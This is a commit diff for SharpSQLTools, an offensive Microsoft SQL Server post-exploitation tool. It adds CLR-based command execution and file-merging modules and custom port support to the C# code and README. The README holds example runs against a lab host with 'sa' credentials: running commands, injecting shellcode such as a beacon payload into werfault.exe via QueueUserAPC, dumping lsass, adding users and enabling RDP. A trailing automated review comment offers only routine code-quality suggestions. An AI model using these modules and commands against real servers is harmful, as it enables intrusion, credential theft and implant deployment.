

添加部分功能并更新readme
1.添加clr执行命令和程序
2.添加clr合并文件功能,方便在cmd被拦截时代替copy /b合并文件
3.修改支持自定义端口
4.更新readme
uknowsec committed Jun 22, 2021
1 parent 7abfb58 commit 735c8a4
Showing 3 changed files with 145 additions and 37 deletions.
83 changes: 76 additions & 7 deletions README.md
Expand Up @@ -23,8 +23,8 @@
Usage:
SharpSQLTools target username password database - interactive console
SharpSQLTools target username password database module command - non-interactive console
SharpSQLTools target:port username password database - interactive console
SharpSQLTools target:port username password database module command - non-interactive console
Module:
Expand All @@ -40,7 +40,9 @@ enable_clr - you know what it means
disable_clr - you know what it means
install_clr - create assembly and procedure
uninstall_clr - drop clr
clr_dumplsass - dumplsass by clr
clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
clr_dumplsass {path} - dumplsass by clr
clr_rdp - check RDP port and Enable RDP
clr_getav - get anti-virus software on this machin by clr
clr_adduser {user} {pass} - add user by clr
Expand All @@ -57,8 +59,8 @@ exit - terminates the server process (and this session)
支持交互模式与非交互模式,交互模式直接跟目标,用户名和密码即可。非交互模式直接跟模块与命令。

```
SharpSQLTools target username password database - interactive console
SharpSQLTools target username password database module command - non-interactive console
SharpSQLTools target:port username password database - interactive console
SharpSQLTools target:port username password database module command - non-interactive console
```


Expand All @@ -84,6 +86,35 @@ nt authority\system
nt service\mssqlserver
```

#### clr执行命令

```
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec whoami
[*] Database connection is successful!
[+] Process: cmd.exe
[+] arguments: /c whoami
[+] RunCommand: cmd.exe /c whoami
nt service\mssql$sqlexpress
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\windows/system32\whoami.exe
[*] Database connection is successful!
[+] Process: c:\windows/system32\whoami.exe
[+] arguments:
[+] RunCommand: c:\windows/system32\whoami.exe
nt service\mssql$sqlexpress
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\cmd.exe -a /c whoami
[*] Database connection is successful!
[+] Process: c:\cmd.exe
[+] arguments: /c whoami
[+] RunCommand: c:\cmd.exe /c whoami
nt service\mssql$sqlexpress
```

#### clr_scloader
```
λ python Encrypt.py -f nc.bin -k 1234
Expand All @@ -94,7 +125,7 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
[*] Database connection is successful!
[+] EncryptShellcode: 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
[+] XorKey: 1234
[+] StartProcess notepad.exe
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 2508
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 2508 Success
Expand All @@ -104,6 +135,36 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
[*] QueueUserAPC Inject shellcode Success, enjoy!
```

#### clr_scloader1
```
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader1 C:\Users\Public\payload.txt aaaa
[*] Database connection is successful!
[+] EncryptShellcodePath: C:\Users\Public\payload.txt
[+] XorKey: aaaa
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 3232
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 3232 Success
[+] hOpenProcessClose Success
[*] QueueUserAPC Inject shellcode Success, enjoy!
```

#### clr_scloader2
```
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader2 C:\Users\Public\beacon.bin
[*] Database connection is successful!
[+] ShellcodePath: C:\Users\Public\beacon.bin
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 332
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 332 Success
[+] hOpenProcessClose Success
[*] QueueUserAPC Inject shellcode Success, enjoy!
```

#### clr_dumplsass

Expand Down Expand Up @@ -153,7 +214,15 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
[*] Adding Group Member success
```


#### clr_combine
```
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_combine C:\Users\Public\payload.txt
[*] Database connection is successful!
[+] remoteFile: C:\Users\Public\payload.txt
[+] count: 5
[+] combinefile: C:\Users\Public\payload.txt_*.config_txt C:\Users\Public\payload.txt
[*] 'C:\Users\Public\payload.txt_*.config_txt' CombineFile completed
```

#### clr_download

95 changes: 67 additions & 28 deletions SharpSQLTools/Program.cs
Expand Up @@ -30,6 +30,8 @@ private static void Help()
disable_clr - you know what it means
install_clr - create assembly and procedure
uninstall_clr - drop clr
clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
clr_dumplsass {path} - dumplsass by clr
clr_rdp - check RDP port and Enable RDP
clr_getav - get anti-virus software on this machin by clr
Expand Down Expand Up @@ -255,37 +257,54 @@ static void DownloadFiles(String localFile, String remoteFile)
Console.WriteLine("[*] '{0}' Download completed", remoteFile);
}

public static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
public static string result = string.Empty;
private static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
{
String value = String.Empty;
var value = string.Empty;
foreach (SqlError err in args.Errors)
{
value = err.Message;
Console.WriteLine(value);
value += err.Message;
}
result = value;
Console.WriteLine(result);
}

static void interactive(string[] args)
/// <summary>
/// 数据库连接
/// </summary>
public static SqlConnection SqlConnet(string target, string dbName, string uName, string passwd, ref string result)
{
string target = args[0];
string username = args[1];
string password = args[2];
string database = args[3];

SqlConnection Conn = null;
var connectionString = $"Server = \"{target}\";Database = \"{dbName}\";User ID = \"{uName}\";Password = \"{passwd}\";";
try
{
//sql建立连接
string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target,database, username, password);
Conn = new SqlConnection(connectionString);
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
Conn.Open();
Console.WriteLine("[*] Database connection is successful!");
result = $"[*] Database connection is successful! {DateTime.Now.ToString()}";
Console.WriteLine(result);
}
catch (Exception ex)
{
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
result = $"[!] Error log: {ex.Message}";
Console.WriteLine(result);
Environment.Exit(0);
}
return Conn;
}

static void interactive(string[] args)
{
string target = args[0];
if (target.Contains(":"))
{
target = target.Replace(":", ",");
}
string username = args[1];
string password = args[2];
string database = args[3];
string result = "";
Conn = SqlConnet(target,database,username,password, ref result);

setting = new Setting(Conn);

Expand Down Expand Up @@ -356,6 +375,13 @@ static void interactive(string[] args)
clr_exec(s);
break;
}
case "clr_exec":
{
String s = String.Empty;
for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
clr_exec(s);
break;
}
case "clr_scloader":
{
String s = String.Empty;
Expand Down Expand Up @@ -384,6 +410,13 @@ static void interactive(string[] args)
clr_exec(s);
break;
}
case "clr_combine":
{
String s = String.Empty;
for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
clr_exec(s);
break;
}
case "enable_clr":
setting.Enable_clr();
break;
Expand Down Expand Up @@ -429,24 +462,16 @@ static void Noninteractive(string[] args)
return;
}
string target = args[0];
if (target.Contains(":"))
{
target = target.Replace(":", ",");
}
string username = args[1];
string password = args[2];
string database = args[3];
string module = args[4];
try
{
//sql建立连接
string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password);
Conn = new SqlConnection(connectionString);
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
Conn.Open();
Console.WriteLine("[*] Database connection is successful!");
}
catch (Exception ex)
{
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
Environment.Exit(0);
}
string result = "";
Conn = SqlConnet(target, database, username, password, ref result);

setting = new Setting(Conn);
try
Expand Down Expand Up @@ -525,6 +550,13 @@ static void Noninteractive(string[] args)
clr_exec(s);
break;
}
case "clr_exec":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
clr_exec(s);
break;
}
case "clr_scloader":
{
String s = String.Empty;
Expand Down Expand Up @@ -553,6 +585,13 @@ static void Noninteractive(string[] args)
clr_exec(s);
break;
}
case "clr_combine":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
clr_exec(s);
break;
}
case "enable_clr":
setting.Enable_clr();
break;
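Review bot: SqlConnet builds the connection string by interpolating the raw target, database, user name and password into a quoted literal, so a value containing `"` or `;` yields a malformed or differently-parsed connection string; the builder avoids that: `var builder = new SqlConnectionStringBuilder { DataSource = target, InitialCatalog = dbName, UserID = uName, Password = passwd };` followed by `Conn = new SqlConnection(builder.ConnectionString);`, and since the same hand-built string was removed from Noninteractive, both callers are covered. The catch branch still calls `Environment.Exit(0)` after a failed connection, which reports success to any wrapper checking the exit code, so `Environment.Exit(1)` is the conventional choice; `result` is only ever assigned in this method, so `out string result` describes the contract better than `ref`. In OnInfoMessage the rewritten loop does `value += err.Message;` with no separator, so several SqlError messages delivered in one InfoMessage event are now printed run together where the old code printed each on its own line; `value += err.Message + Environment.NewLine;` restores that. The four new `clr_exec`/`clr_combine` switch cases repeat the same concatenation loop and could share one helper, though note each one appends a trailing space that the CLR side may depend on. interactive and Noninteractive both continue outside their hunks.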
4 changes: 2 additions & 2 deletions SharpSQLTools/Setting.cs


